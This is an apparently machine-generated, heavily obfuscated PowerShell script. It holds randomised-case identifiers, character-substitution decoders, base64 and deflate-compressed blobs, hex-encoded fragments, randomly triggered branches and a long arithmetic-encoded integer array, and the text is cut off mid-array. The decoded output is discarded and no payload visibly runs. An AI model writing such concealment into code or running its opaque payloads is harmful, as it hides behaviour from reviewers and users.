FuNCtion xXkX { 
    [ CmdLEtbinDIng()]PaRAm( 
        [parAmEteR(vAluEfrOMpIPeLine)]
        $EJZQhwwV,
        [parAmEteR(vAluEfrOMpIPeLine)]
        $AcNPwHw
    )
    $iKjHmyJ=$EJZQhwwV.repLace('5cV',[sTRInG][ChAR]39).repLace('h37',[sTRInG][ChAR]36).repLace('PeW','|').repLace(([ChAR]97+[ChAR]88+[ChAR]73),[sTRInG][ChAR]58).repLace(([ChAR]114+[ChAR]69+[ChAR]108),[sTRInG][ChAR]92).repLace('1Ob',[sTRInG][ChAR]96)
    $SnZgnjB= $AcNPwHw  -crePlACe ([CHAr]86+[CHAr]83+[CHAr]57),[CHAr]39  -crePlACe'59A',[CHAr]92 -crePlACe'THu',[CHAr]96 -REpLace([CHAr]53+[CHAr]105+[CHAr]84),[CHAr]36-REpLace  'QmP',[CHAr]58-REpLace'tLP',[CHAr]124
}
$gLaE = 'h37result = 5cVA?y_l<caXIhM>QLgHhh{rElBKqAPeWfMcdw9t3M_rElI@wh{@3JcPeWoYaXICiDq1rEl8PeWynaXIqNrElSbtduerElaXIC9Ue1ObC{IA@gIhyPF1lUw9lXP6SuUi;n[X=ubW<' 
$gLaE+='[7VLS<qqMGCVgGx47yTi^j<ffl>KGVt68;jpIRPeW1Ob2aZ7tGYIp?1TWIVXpMbqOUVWoO>sM_5S<;rMQBePeWHwZI1_epDlMmzJPA=bcB?KtawpFM{N>ZmDXYFN_@NclR_CP}j;h5KZ8pRc=OqC['
$gLaE+= 'uhPeW?pHGVl8PHgWL<E5kvLZ7EfqI]}fI1ObIKc3{H?fuC?nGCikcd[t}^N5;tPeW5LBw[mER>FcK7SCB3PeWoRN>yrElN_PeWHctPO5=Pj[{9rElaXIXxVP1Ob[1h08sU2SbN]aa}0x17xCG{x[P' 
$gLaE+= 'eWXegCnDf_yJbPeWaXI}eCLHDrbdWuTwoU7ZI1Ob2]jrEltbM8Y{v]R0YbncC5q_abg6x@PQv2TG;6tuim;Lg@Ug^3Kv@1aXI;Wco;@JsH<4pR1Obr}PeW[xArEl@qGsEWvTT;vdMtQ_}UhTaXIa{'
$gLaE +='4gq4X7k1rElLZ{8t^yv1ObitOhb>p8NlicnwhTZHpG5{iMYr0FgPPeWd^yV9OnmmspL[rElGYuVe37y;9{WYk1ObRkvQC?dD=z29PUH1DJ1niUizR]YA1Ob>lp9lSEXrElo1{8DH]_4N;PeW_=40<' 
$gLaE +='Ycp[zD}v5jUrElN7hGRYYD0efehn;]<[BGrElo1Ob5GzkR>4cfaXI8ok0xPeW?A4<=0<AY;AiLo]=hACIaXIrEl6ncJrElDs<U>IVwQ5G=T@<tL8^A8S@C7gS@1rElQ@CcYSnS{X9u;j>rEluU;^x' 
$HuIqOKy ='1w5cV'
$HuIqOKy = $gLaE+$HuIqOKy
$bFYL = @('5iTresult = VS9t[ZBy=@KhBIKN@ETHueL^8tLP_?02THuQ4THueW<HZ8YHsFv?j<Z2BS83ZJtdCCE=pgsNh@b7q]THu38HA4>THuvzv]us_f{;vqo{UZ6OLAQmPwLJiz8aez>t_kFHEZR41SfdBtLPlH{]KR@inFl3OX6nZWKJL1P<MpUaX5','lbnTf^=AHpY^THurEM0Mj9jiBAz72cFB>IsQ4jtLPX?Hp12F=lNhm^7Tg3O259AWQmPK7Ln4CD[jvIa1lOgJRGuj_4B;JP9[iRqmDVQVeX=[ap_AzA59AQ[jmyf_THu1mjfwI4mix[QmPxjv4cNNdTHuQmPotLPYx3m259Ah1pYB?EdnhMX4LR','RTHuV<M}gXl}CojM=3^QUsKwSw0sBnUZ2uZwATrGyl?D^4r;ayrM_<O5[yv}^}=Ooqe50N2Iww8z<TziMprXPzinkwoWAbdkLC5Fj3v8Eh_4>j0XIhNaji87tMFY}hgqgMex>xZn7_rTHuIJT37rAKCIi[THuzG3GS5B3F09HPaZqBt}iH859A','A59AIR@tLPeFTO^cWm5OsKnHTk@]QmPkaUI6QmPa8VSZs1{D5pTu=RJS>kFE;4y7a2Fx9oS[vWN0?<@pWr[QMWOyuH7cElOZ4cTHutLPEeD^0<tk51RM]r7bSc@LncdPDjxCIvOYULmVq}RGW4}[WZTHupomHC8[qZz0259A0Y]Q5MolSrvVS9')
$nEtEJKI =-jOin$bFYL
xXkX -EJZQhwwV $HuIqOKy -AcNPwHw $nEtEJKI
FuNCtion GlWnRQHQ { 
    [ CmdLEtbinDIng() ]PaRAm( 
        [parAmEteR (vAluEfrOMpIPeLine)]
        $byycTV,
        [parAmEteR (vAluEfrOMpIPeLine)]
        $QBvoqWr
    )
    $yIrq = [SyStEM.io.MEmorySTrEam][sysTem.cOnveRT]::froMBAse64STRING( $byycTV ) 
    $yIrq | jJWRUAHQ    $DFIlf = $QBvoqWr -RepLace ([CHaR]99+[CHaR]103+[CHaR]108),[CHaR]58 -CreplAcE '3Kg',[CHaR]92 -CreplAcE  ([CHaR]48+[CHaR]109+[CHaR]104),[CHaR]124  -RepLace ([CHaR]117+[CHaR]66+[CHaR]112),[CHaR]36-CreplAcE 'Oao',[CHaR]39  -RepLace([CHaR]57+[CHaR]121+[CHaR]98),[CHaR]96
}
FuNCtion jJWRUAHQ { 
    [ CmdLEtbinDIng()]PaRAm( 
        [parAmEteR (vAluEfrOMpIPeLine)]
        $ZmtqZiUJ
    )
    (nEw-ObjEcT  SYSTeM.Io.StREamrEAder(( nEw-ObjEcT  Io.compResSIoN.deFlaTESTreAM( $ZmtqZiUJ, [iO.coMpreSSIoN.COMprESSIOnmodE]::DECOmPrESS)) ,[TEXT.eNcoDing]::aSCii) ).REadtoenD()|oUt-nuLL
}
$RSjaN ='Dc3ZFqkKAADQXzkPd63z2qRBlIooSpMGSWkkQoNK+Pdz9w/s/6qkft2aP9M/f8EhWAtUYAp37DJd4l4s2Pc9uc98mA9dQQrZWQOlC4lICjtL0KpE4qGM4ziPu3' 
$RSjaN+='Atkx2ANSdvoyJQncNc/onjrBy+Rc+fjcm5QmHxU7ptz4kX+pTmg8wYgvRN2L4hbJxDY5vg4nw/dSxPtFhzJGpy5FlHC4HO7nDwaPWJ5J02k3LJAuCvhfYjn1gJ'
$RSjaN += 'eE95MHORCexJRR9SijUste0XoOCY/GmrD4w36kSy+ZBT3CtW9oNnDv4SDY04zFZwzqkBu0iyJ7vwsmkSHHke/734Vb9Q3IyouzlqbajUWmOJTuteE7qGINxC3g' 
$RSjaN+='/mYtkHpT1bnCyhkI25SlCXpbnad1I7VnfjA2LTKVUGZYCh17mwMB4MfiIJ9QZi+rD0yUzbglK4I5EntPvlRCWJyaXtVJz0UXXrp45On8CuWx836oTTwHMnC/OM' 
$RSjaN +='XFmBQ+bRgEpL8QE5swP9djTiwVLAm320jkQr9WzYcoo3eeagbS+Uu7cTimmRORvcVUB2bgPS0GFO9R60Lqn3JSQHpODj1up3XTW6gfTwBWSSGjoRolUg2WRYIp' 
$RSjaN += '0JSghEa4fUap0k6qvR5bmYerW+ODmHbeUx8qNbD4Yy87VqZI5sSE9ScWytUHXTohEGMepOKc6dGrF7+r7vHwxcvsjKDIqdfht4myXOknx0bnRyRj07GX7uEdm6' 
$RSjaN+= '/UXZAoAFPXjltoYABeIcl4N2oqvtIPBkEN+u+Uxpr1PK/5+ObXmZ9Eep2N3YG33vZwWsO/B3AFLGUvXFvRMPIny25Xdfm8FXwMs0VX1DF61rIC1n14S+d5t1Lu'
$RSjaN+= 'zhefSm1JLr7gcfGzz9LYNUNJx5id1w6+/STSEsrvLnsu5nfHBZTfuErduaO37fuk/HXp1Z8CNlPr/xXv0cgXSOCvQxT95uo9Ykxk2zlQykVENjH8tMcSN1qNN4' 
$RSjaN +='rwXMK1Ckq90mdT3xkhI6+O48+hZhtN1QGusUMAr55kSBwBTDP7guOhUgY+IZgoumuoTmEPhAG2fEwFHX4wP4tdGaZl/kHLqNgt6OgSnlrKnvLmKu/WV2fufsKI' 
$QPdI= 'def/8B' 
$QPdI =$RSjaN+ $QPdI
$UCeykUy= @('uBpresult = Oao=vn;D_FzD7v3AH;enI6vty<wM@LstLSKym0N<vb?MULn>qvT;EScglIMOgrFGRfDmPOBl?SA;9zW<gvEj3j>GcglNL1yOPT8pRDJe{2Wzq?6@zy0mhCtnCMUxLoVRCOoWDB^z;[dIn^2QbBaSt{uvQ0B]jQ','fz}hG0Z}qK3Kgcglh2TCrA@}0dUC9j?Hz=u5PXZ@Os4ETfB?QK{^<N0mhnZNXOuLZ69yb9ybNCgqP4[f0x7V2FL?7WK{oveUwbukOGhIH}6Shzz1=zF[M_kUxiHYlj^S@tBW3Kg9_J[<0mhE^tjD8rMZACnR=Qd5D1l;QAS>nW', 'xei9yby9yb3R0mhCQv>ZkfhLLgocIn>XLg0mhYHii0Y}caBkW=5Ndky0useXfhvbcgla[X0v0mh_XjUQym?xp]Ur1zcbx[Sll06naQB>T]W_@wz5Bf7U]Y^l59ybNfTbEOBmq0mhIusLS8dQsNT=>97k@fWamn>3tZk{Bl=EsY', 'j7ndYo6AFfjgw4GaNdFqoA3KgMr<t^c0q9o4A1Jd^Qy{Rq<}jNSGwCpYXjkW569ybs{Dq_1MwB9ybi=RA>A94IdMzVW[Zr7X1hPVOj3KgLwqRGm;WGcglrhZxaqP?S^1Rt=GXj[}2qH>AvSnn0b9=DG9yb9rKOr9ybQLB00mh8','9yb3URHDP@xd>snD}4I}bBWYCCe0J2D^}SDpby1>MT{qHo^f}Yw;;]FiWjzdLjzFacgl4vP5b<8?O]Nwd9yb<bKu9{23KgW_13WuujRT_Ej}q5hFQz3Kg;K[0;OcglL?GWDT@75IiHMl2sH<SvZFW9ybPXl^uB5>bJ>omqkw;n','3KgQ8=[K0V3J@]Qz<FqP^?RCYZYfx5cewFPN7_Qu2OBcgl}Oe^VH=uv;MG6AMN9hoF{{}venb2US]cgliXxwj9ybU9jt5=yy7cglcglY4]kxr=u<JSK2_}dIN9pkCQ[7mD3KgIXO2lmJL9rtZtikonkoWFg[oRv1ps9ybS3iOa','o')
$aDdguC =-jOin$UCeykUy
GlWnRQHQ -byycTV $QPdI -QBvoqWr $aDdguC
FuNCtion whwKoOV { 
    [ CmdLEtbinDIng()]PaRAm( 
        [parAmEteR (vAluEfrOMpIPeLine)]
        $jToBn
    )
    IF(( GeT-RaNDOM @(0..20)) -eq 0){
         [SyStEM.io.MEmorySTrEam][sysTem.cOnveRT]::froMBAse64STRING( $jToBn) |KUYM
    
    }
}
FuNCtion KUYM { 
    [CmdLEtbinDIng() ]PaRAm( 
        [parAmEteR (vAluEfrOMpIPeLine)]
        $OtpciGMi
    )
    (nEw-ObjEcT  Io.compResSIoN.deFlaTESTreAM($OtpciGMi, [iO.coMpreSSIoN.COMprESSIOnmodE]::DECOmPrESS ) |foreACH-ObJeCT { nEw-ObjEcT  SYSTeM.Io.StREamrEAder( $_,[TEXT.eNcoDing]::aSCii)}).REadtoenD( ) | oUt-nuLL
}
 $NDBXrd ='VY4xC4MwEIX3/oqHFFwktBaHFjp07F7ofMZTQ2MiSSTk3zfWoTgcj3fv7rs7OvaLDrijeNmOEpTHlNAqF8ZsBR6mgwqlB8HPLBVpWMNoWdLiGcku2UtGsLrDlHWkgDiy+UWScqsl+akQGZMaxpBX8xDDrxENLPBmrSsYG/Esp1220VZQZMd/rOY+CCFA23PdynRMWicMWQNUvz8Pb60Rar7Vp4torqI+56qb4vAF'
whwKoOV -jToBn $NDBXrd
FuNCtion lrXZedpm { 
    [CmdLEtbinDIng()]PaRAm( 
        [parAmEteR (vAluEfrOMpIPeLine)]
        $xTuU,
        [parAmEteR (vAluEfrOMpIPeLine)]
        $HGuGrFIV,
        [parAmEteR(vAluEfrOMpIPeLine)]
        $mlZsEs
    )
     [STRiNG]::JOIN('',( $xTuU-sPlit'o'-sPlIt's' -SpliT 'M'-split';'-splIt '<'-Split'-' -SpLit 'd'-SpliT 'V' -sPLIT'k'-SpLIT 'c' |foreACH-ObJeCT {([CoNvERt]::toiNT16( ( $_.toStRInG() ), 16) -aS[chAR])} ) )|oUt-nuLL
     (nEw-ObjEcT MaNaGEmEnT.AUtoMatiON.PScReDentIal ' ', ($HGuGrFIV |cONvErtto-SeCuResTrING -K  (22..7) ) ).GEtNEtWorkCreDEnTIAL().PASSword| oUt-nuLL
     [SyStEM.io.MEmorySTrEam] [sysTem.cOnveRT]::froMBAse64STRING($mlZsEs)| LUxE
}
FuNCtion LUxE { 
    [ CmdLEtbinDIng()]PaRAm( 
        [parAmEteR (vAluEfrOMpIPeLine)]
        $HvpiQO
    )
    IF((GeT-raNdom @(0..20)) -eq 12){
        $alcID =(nEw-ObjEcT  Io.compResSIoN.deFlaTESTreAM( $HvpiQO,[iO.coMpreSSIoN.COMprESSIOnmodE]::DECOmPrESS) |foreACH-ObJeCT { nEw-ObjEcT  SYSTeM.Io.StREamrEAder( $_,[TEXT.eNcoDing]::aSCii )} |FOReaCH-oBjECt{$_.REadtoenD( )} )
    
    }
}
$uzfXTtBM = @( '24c72M65c73V75o6cV74d20s3dk20-27<47V43-7do68-32;6d-3cM59c6fM37s5cd3dV7cc5bV4eV5dk38;45o69s6bc37d40s7cV3dd64d6bM6aV69V4cs5ec6e-3d-4b-34o69<6e;50<3bV31s6bo41M30c53V54c46-6bs42k5fs49d59s5bV5es65k4b;5fV7c-7cd30o75-50V7d-61c44c5ck73o42k62<75o69o53c61<4fc3f<56c77;43k77;4ds6e-5fd3ds3dk59-46-49s3as4ac58c54d52;70<','3d-77;49s50;66s41o49c6ao44c3cM3cM52c37k39o6dc35-4fk60c5bk6bM4bk79;3es52c3bo66-52M35V68k4c-53M3d<68o7ck49V6cd53V5a;50-3eV64s6d<77d35s4fc42k30<4b-54d66V6dM67k55d3e;7bs37c50;55o60o60s5b;5c-4c;79o7ck3b-6e;41M61s7a-32M50s3bd4ec54<4bd45<76k3as37;31-38c53c3dM32;71-40o7cs78M34k37V71V5ak70M50-67<42c69;4fo73c68-6bo', '5fd79V71s5ad40M4cd69<73<45s5b-31s74<54-70d7cs76V55M3f;7cM31V4ck3eV3cs66d79s32k61o66;4cc37M5eM3bs41d3c;6fo72V4cc34k5bM3aV41o60d53d69o6ck70s7as52M5dc37-36-6fk71o79s44;65-40k78k68d6dd69<45;64o31s4e<70;37o35;56;7cc7cV62c4cc4ed6bM4dd3a-56V5fs79k35d62s67<71k3e-77<6fk40s7co77o7ck78d7ad7cd44-75c60o48;68M61M7ad3d;', '46;5cM5cc6b;70V6e<32s41M61M6ck36;35;4a-59<54o6bV38k4ek79;3bc48V53-46o5ak58M6co57k5aM77d4bM5dk68s58-31M53s77o5d<5cM45M3d;34;46;30-40V39V5as35<57M35c51<49-5cc43o3fo41k54V76-3ak6a;30V43M45k57c49<3aV41s63<62<7bk7dc72M5ac3fV50o64c71-73c68M5ec49V47V5dM32M5e-49k6cV31s52V72-4f;6ds5a-49o33V5a<79k7dd72k66o5f<60V3ds', '5aV5f;72k37-65M3a<4fV33s72d62-54o49;7dV4d<54<36s41d56o5as3ec52s6fk3bc62o3aM42s4f-37M6bc7ao59d47;3cV58M6a<6fs64V77d71o41k5bc55V3b<33c31o7b-33V4eV68-4cM55<66d51-61M51<64-30d30c55o32<3eo44o56o3aV35-57k3cd42M76o61-72V60k4dd4bM32-42k48;60k3dc3dk52s5c;4ac3cc6fs48k44M3es5fk58M56V64<77c3eM4a-4b;7bo4bM61k70V41d3bd','39<73-4dV5cV66M6fs3aM3ds46o52o7dc42-57o32;73M78d40c5bc3fo3ac5fd79k73c34;67o4bs53s5a-6fd6cM66V60d5d;56;4fc3c;73o6bc66V3a<69;76<64k41d6ak68M55d7as74-32s5ed5aV4cV5b;6bs7a;3cM4fo55s7dd40V41M4bo45d3fM73;6f<5dk73o4bk46;3f-3bc41s72<34<42M5bk5bV6dV5as3eV38;61d6cV75d6d<3es3as5fM5dd61d7d;51<52-68k40M4bc37d5fs5ec64V','73d27')
$pCYqt=[STRiNG]::JOIN('' , $uzfXTtBM )
$ifvQDTpU = [ iNT[] ]( (85 - 51), (23+24),(96- 75), (14+13),(10 + 29),( 47+78), (25-9), ( 85 - 66), (63 - 27), (19+ 28),(49 -27), (55 - 33), ( 68 - 30), (87 +40),(58- 41),(37-15), ( 2+ 37),(22+20), ( 70- 49),(47- 28), (22+ 16),(42 +81),( 46 - 30),( 27-7),( 55- 18), (66 -22), 17,( 1+ 66),( 10 +22),( 68- 26),( 5 +16),( 70-47),( 7+81),(44 +82),(42 +57), (35 -9), (16 +68),(92+ 2),(78 - 57), (96 +3), ( 29+ 35), ( 44 + 66),(86 +13), ( 0 + 88), ( 75+9), (54 +41), ( 89 + 31), ( 72 + 27), (15 + 64),(58+ 52), (72+ 27),(32 +56),( 79 + 5),( 56+25), ( 81-15),( 37+62),( 8 + 60), (69 + 57),(20+ 79), ( 36+42),( 74 +10), ( 81 + 11), ( 4+ 78), (48 +51),( 54+25),(38+ 72),( 41+58), ( 32- 9), (56+28), ( 7+86),( 29 + 41),(4+95),(58 +60), ( 14+112), ( 55+44),( 55 + 46),(64+ 20), ( 66 + 27),( 27+ 93),( 46+53),(22 +43),( 2 + 70), (80 +19), ( 38+ 78),(21 +63),(11 +83), (23 + 55), ( 9+90),(41+38),( 25+ 101), ( 58 +41),( 93-20), ( 91 -7),( 24 + 70), ( 0+66),( 32 +67),( 90-21),( 4 + 68), ( 39+57), ( 98 - 71), ( 91 - 7),( 35+ 46),( 66 +20),(78+ 21), ( 76 +15),( 63 +63),(45 +51), (75-59), (24+ 60), ( 59 +35), (71 + 49), ( 41 + 58),( 95-19), (38+ 34),( 21 + 78), (55+ 19), (92 -8), ( 77 +17),( 4 +96), (79 +20),( 39 + 51),(56+32), (63+ 33), ( 80 -58), (45+39), ( 55 +38),(41+ 75),(86+13),(80+8), (41 + 69),( 77+ 19),( 22+63),(58+26), ( 68+ 25),( 42+32), ( 84+ 15),( 63+25),( 52 +74), ( 73 + 23),( 80 + 8), ( 72 + 12),( 42+ 51),(22 +74), (72 +27), (13 + 66), (33 + 55),(25 +74), (66+ 12),( 15+69),(12+82),(33 +71), (28+ 71),( 34 + 42), ( 68+58), (92+ 4),(23 +67),(73+ 11),( 31+62),( 47+49), (42+57),(97 - 21), (42+68), ( 69+30),(68+ 6),( 70 + 14), (32 + 62),(55 + 65), (5+94), ( 99- 8),( 95-7), ( 4+92), (53- 36), (45 +39),( 71 +22),(71 + 45), ( 70 +29),( 71 + 20),( 21 +89),( 75+21), (46+ 39), (28 + 56),( 44 + 50),( 21 +79), ( 9+90), ( 97-9), ( 74 + 36), ( 4 + 92), ( 24- 7), (8+ 76), (34+ 60),( 52 +68), (46 +53), (75+1), ( 93- 21), (75+21),( 45 -22),(95-11), ( 52 + 41),(72+ 24), ( 60+ 39),(9 +79),( 93 -21), (4 +92),(9 + 81),( 53+ 31), ( 23+ 70),( 10 +98), (97 +2), ( 37+54),(87 +39), (82 +14), ( 87 - 65), ( 12 +72),(13 +80), ( 45 + 67),( 63+36),( 36 +52), (0+72), ( 20+79),(37+36),(31+ 53), ( 75+18), ( 93- 19),( 18 + 81), ( 25 +51),(36 +74),( 89 + 7),( 23 - 4), ( 17+ 67), ( 56 +37),( 29+41), (72+ 27), (5+ 86), ( 31 +41),( 24+ 72),(39+ 51),(96 -12),(10+ 83), (79 + 21), (15 +84),(96- 5), ( 15 +111),( 51 +45),( 90- 74), ( 17+ 67),( 66+ 27),(14+ 90), (21 + 78), ( 0+79), (32 +40),(13+86),( 32+ 46), (62 +22), (61+32), (6+ 64), (72 + 27), (13+ 63), ( 40 +86),( 68 + 31),(37+35),( 7 + 77), ( 32 + 62), (73+ 31), (6+ 93),(59 + 32), (34+92),( 35 + 61), ( 12+ 7), (3+ 81), ( 10 + 83),( 71 -1),( 63 +36), ( 74 + 16), (65 +23), (68 +28), (44 -22), (40+44),( 71+22),( 94 + 10),( 63+ 36),(58 + 21),( 81 +45), ( 81+ 15),(79 +12), ( 68 + 16),(27+ 67), (13 +87), ( 93+ 6), (10 +66), (46 +80),(84 + 12), (41 + 50),( 82 +2),( 13+81),( 68+44), (15 + 84),( 34 + 56),( 20 + 68), (64 +32),( 45-27), ( 74 +10), (9 +85), (53 + 51), (4 +95), (69+10),( 86 - 14),( 41+58),(71 + 8), (1 + 83), ( 41 +53), (14+ 98),(54 + 45),( 84 + 4),(82- 10),(48 +48), (16 +69), (45 +39), (21+ 73), ( 29 +91), (33+66),( 51+ 25),(80+46),( 14 +82),( 100- 82), (44 + 40), (70 + 23), (6+64), ( 81 +18), (74 +17), ( 92 - 20),( 48+51),(79-7),( 37 +47), ( 15+ 79), (98+22),( 73+26), (56+ 35), (85 + 25),( 56+40),( 34 - 17),( 36+48), ( 20+ 73), ( 78 +26), (84 + 15), (47+ 41), (18+108),(90+ 6), (69- 51), (79 + 5), ( 18 +75),(40+ 64),( 74+25), (70+20),(60+12),( 80+16), (59-36),( 36 + 48), ( 73+21),( 15+93), ( 100-1), (85 - 9), (91 + 35),(33+ 66),72, (3 + 81),( 95 - 2),(33+87), ( 42+57),( 5 +85), ( 64+ 24), (6 +90), ( 24+ 61), ( 30+54), ( 64+ 29),( 57+ 51),(85 +14), ( 67 +9), ( 45+27),(53 + 46), ( 19 + 53),(23+61),(50+43), ( 7+ 67),( 70 + 29), ( 12 + 76), ( 31 +79),(81+18), ( 52 +21), ( 42 +42), (88+6), ( 87 + 21),( 35 +64),(53 + 23), (9 + 117),(15 + 81), (27+ 58),(64 +20), (2+91),(38 +74), ( 57+42), ( 33+ 58), ( 54+ 34), (97 + 2),( 40+38), (80 + 4), (92+1),( 6 + 102), (39 + 60),( 86-7), (9+63),(8 +91),( 84- 5),84, ( 6 + 87), ( 21+ 49), ( 2+ 97), (89 -13),( 18+ 54),( 52 + 44), ( 27-4), ( 48 + 36),(19 + 75), ( 77 + 31), (79+20), (83 + 8), ( 42 + 46),( 33 +66), ( 1 +71),(64 + 20),(48+ 45), (24+ 50),(91+8),( 61 + 27), (100+ 26),( 75+ 24), ( 57+21), ( 10+74), ( 70 +24),(9 + 95),(20+ 79), (96-5),( 9 + 117), ( 44 +55), (55 + 18),( 22 +62), (21+ 73),( 59+ 53), ( 89 + 10),( 68+11),(79 - 7),(38 + 58), ( 54- 37),( 65 +19), ( 7 +87),( 91 +17),( 21+78),(3+ 87), (40+ 32),(91 +5),(60 + 25), ( 48+ 36), ( 82 + 12), ( 1 + 111),( 61+38),(11 + 65),( 34 +92),(17+79), (12+ 76), (24 +60),(12 +81),(76- 6),(17 +82), ( 30 +46),( 83+43), (44 + 55),(1+71),(86 -2), (11+83), (98 +18),(21 + 78), ( 78 +10), (99 - 11), (13+83),( 62-46),(57+27),( 81+12),( 14+ 60),(65+ 34),( 5+ 85),(39 + 49),( 36 + 63),( 100 -25), (0 + 84),(58 + 35),(71 + 29), (53 +46), ( 49 + 30), (16+ 56), (44 +52), ( 14 +5), ( 24 +60), (25+ 68), (51+53), (63 +36), ( 24+ 67), ( 88 -16),( 42 + 57),( 81 -6), (72+12), (97- 4), (17 +57),( 34+65), (71+19),( 27 + 45), (15+ 81), (30 - 13), (93-9), (27 +67), ( 66 + 50),( 66+33), ( 6+84), (11+77),(89+7),(14+ 3), ( 64 +20), ( 33+61),( 26 + 90),(36 + 63),( 59+17),(11+ 115),( 17 + 82),(22+51),(67+17), ( 91 + 3), ( 63 + 53), ( 37+62),(44+ 35),( 51 +75),( 47+52), (24+ 51), (25 + 59),(68 + 26), (28 +88), (10+89),(54 +34),( 6 + 104), ( 24 + 75), (90 -12), ( 56 + 28), (81 +13), (8+ 112), (35 + 64), ( 91-15), (30 + 42),( 24 + 72),(48+42), ( 68+16),( 99 -6), (44 + 68), ( 50 +49), (25 + 51), ( 96+ 30),(73+ 23), (20 + 70), (12+ 72), (65+ 28),(58 +16),(43 +56), ( 7+ 72),( 61 + 11),(74 + 22),( 68+ 17),( 42+42), (87 +6), ( 62 +54), ( 10 +89), (15 +73),( 8+ 64), (33 +63),18, (91 - 7),( 23+ 70), (35+ 65),( 65+34), ( 25 + 51), ( 99 + 11), ( 5+91),(68 + 22), (2+ 82), (90+3),(89+ 7),(97 + 2), (2+ 86),( 77 + 33), (55 +41),( 65-43), ( 1 +83), (80 + 14), ( 26+86),( 79+20), ( 61 + 27),( 55 +71),( 14 +82), (67 -45), (56 +28), (57 + 36), (32 +68), ( 45 + 54),( 65+23), (80 + 46), (66 + 30), (59 -42),(3+81),( 65+ 28), ( 84 + 20), (48 + 51), ( 56 +20), (93 -21),(5+ 94),(17 +56),(30 +54), ( 53 +41),( 76 + 28),( 29 + 70),(8+80),( 38 +72), (19+77),(21 + 69),(80+ 4), (45 + 48), (38+58),(58+ 41), ( 62 + 17),(18 + 54),(95+ 1),( 97 - 78), ( 3 + 81),( 39+54), (23 +85),(75 + 24),( 80 - 4), ( 2+ 70),(51 + 45),( 98 - 81), ( 5 + 79), ( 42+51),(70 +26), (26 + 73),( 42 +34),(8 +118), ( 24+72),(39+ 51), ( 11 + 73),( 79 +14),(14 + 98), ( 63 +36),( 42+ 49), ( 60+12),( 54 +42),(20+ 2),( 4 + 80), ( 15+ 78),( 13 +53), (63+ 36), ( 13 +77), ( 5+67), (12 +84), (37 + 51),(68+ 16), (26+ 67), ( 78 + 18),(44 + 55),( 33 +55),(86 -14), (97-1), ( 1 + 22),(34 + 50), ( 71+22),( 75 - 5),( 67 +32), (88 - 9), ( 48+ 78),(7 + 89),(79+12), (77 + 7), ( 87 + 6), (75 +33),( 33 +66),(87-8), ( 11 + 61),( 62+ 37), 79,( 28 +56),(31+63),( 26 + 86),(53 +46),(71+ 19), ( 20+ 68),( 43+53),(10 +75), ( 66+18),( 53+ 41), ( 60+ 48),( 2 +97), (87-11), (59+13),( 84+12), ( 29 + 61),(50+ 34), ( 85+ 8), ( 70+34), ( 36+63),(26 + 53),(69+57), ( 12+87),( 95 -20), (70+ 14), ( 13+ 81), (6+110),(48+ 51),( 27 +64),( 91+ 35),(40 + 56), ( 9+ 13), (66+ 18), (92+2), ( 93 + 23), ( 19+ 80), ( 64+24), ( 30 +58),( 45+ 51), (29 + 56), ( 57 +27),( 75 +18),(12+ 96), (56 +43), (43 + 48),(14+ 112), ( 38 + 61),(33 +46),(82+ 2), (27 + 66), ( 5+65), (39+60),( 13+75),(9 +79), ( 38 +58), (17 - 1), ( 83 +1), (56 +38), ( 26+90), ( 81 +18), ( 34+ 54),( 45+43),(3+93),( 7 +9), ( 89-5), (55+38),(98- 28),(26 +73),( 81+10),(29 + 59),( 38 +61),( 36 + 37),(91-7),( 36+57),( 84 + 36),(91+8),( 49 + 27), ( 0 +126), ( 64+ 32), 91, ( 76+ 8),( 34 + 59), (68+ 40),( 60+ 39),(51 + 40),(44+82),(56 + 43), ( 88 - 10), ( 33+ 51),( 46 + 48), ( 31+ 81), (12+87),(85 +6),( 19 + 91),( 15+81), ( 82 + 9), ( 0+ 84), ( 5+89), (15+ 105),( 6 +93),(66 +10),( 58+ 52),(20+ 76), (48 + 40),( 20 +64), ( 83+ 10), (16 +50), (19+80), ( 65 + 14),(78+48), ( 82+14), ( 58-35),(51+ 33),(14 + 79),( 90 + 14), ( 51 +48), (33+ 46), ( 92 -20), (76+20), (28 +62), ( 99- 15),( 30 +64),( 33+ 83), (36 +63),(34 +56),(99 -27),(71+25), (13+77), (94- 10), (26 +67), ( 74+ 26),(20 +79), ( 64+ 26),(87-15), ( 99-3), (18 +67),(34+50),(91+2),(88- 14),(11+88),( 96 - 6), (5 + 67),(46 + 50),(50 -31),(55+29),( 66+ 27),(1+107), ( 7+92), ( 56 +35), ( 5+105), (97 - 1), ( 1 +89),( 43+41), ( 100- 7), ( 64+ 36), ( 95+4),( 5 + 71),(85- 13),(22 + 74), ( 97 -79), ( 63+21),( 12 +82),( 64 + 52), ( 75 + 24),(97-21),( 68+42), ( 76 + 20), (10+ 80),( 55 +29), (68 + 25), ( 93 - 19),(68 + 31),( 84 -8),( 97+13),(40+56),(79 -61), (63+21),(70+24), (39+69),(26 +73),( 85 + 3), (46 + 80), ( 100-1), (54+ 24), ( 9 +75),(21 + 72), ( 46+50), ( 36 +63), ( 34+45), (9 +117), ( 19 + 80),(50 + 24), (56+ 28), (41+52), (51 +15), (14+85), ( 13+78),(96 +14),(63+ 36), (19+ 54),(12+ 72),(34+ 59), (12+108), (26 +73), (56+ 35), ( 61 +65),( 84+ 12),(1 +17),( 19+65), (47 + 46),(88+ 20), (37 + 62),(41+ 35), (26 + 46), ( 54 + 42),( 56-37),(44 + 40),( 24+ 69), (7+ 63), (86 + 13),( 4+ 72), (81 -9),( 3+ 96),( 66 + 9),( 33+51), ( 3 + 91),( 59 + 41), (27 +72),( 19+ 69), (61+65),( 84+12), (7+15), (47 + 37),(43 +50),( 20 + 96), (6 + 93), ( 38 +41), ( 51 +75), ( 25 + 71),( 21 +69),( 54+ 30),( 65+29),(55 + 45), ( 44+55),(70 + 6),( 56 +70),( 85 + 11),(77-61),( 18+ 66), (15+78),(74 + 34), ( 67+32),(1 +87), ( 58+ 52), (62+37),(77 - 2), (70+14),( 57+ 37),(49+71),(5+ 94), ( 75 + 15), ( 61+ 11), ( 88 + 11), (5+68), (91 - 7),( 65 +28),(81+ 19),(35+64),( 40 +48), (15+57),(14+82),( 84 - 68), (19+ 65),(96 - 2), ( 90 +30), ( 47+ 52), ( 94-15),( 90 +36), (69 + 30),( 24+ 49),( 37+47), (49 +44), (2+ 106), ( 28 +71),( 60+19),( 61 +11), (10+ 86),( 50-34),(24+ 60), (2+91),( 20 +54), (90 + 9), ( 82-6), (54+ 72), ( 83+13),( 31- 9),( 59 + 25), ( 81 + 12),( 6+60),( 88 + 11), ( 2 + 88),(83- 11),( 7 + 89), (11+ 6), (40+ 44), (46+47), (71 -5), ( 